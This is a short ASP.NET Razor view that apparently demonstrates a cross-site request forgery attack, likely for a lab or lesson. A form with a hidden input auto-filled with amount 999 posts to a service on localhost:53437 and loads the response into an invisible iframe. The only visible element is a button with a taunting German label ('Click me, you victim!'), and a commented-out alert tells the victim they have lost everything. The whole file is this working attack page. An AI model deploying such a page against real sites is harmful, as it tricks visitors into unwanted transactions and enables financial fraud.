@{
    ViewData["Title"] = "Home Page";
}

<form action="http://localhost:53437" method="post" target="blubb">
    <input type="number" name="amount" value="999" style="opacity: 0;"/>
    <button onclick="/*alert('Du hast leider alles verloren, Pfeife!')*/">Klick mich du Opfer!</button>
</form>

<iframe name="blubb" style="width: 900px; height: 500px; opacity: 0;">

</iframe>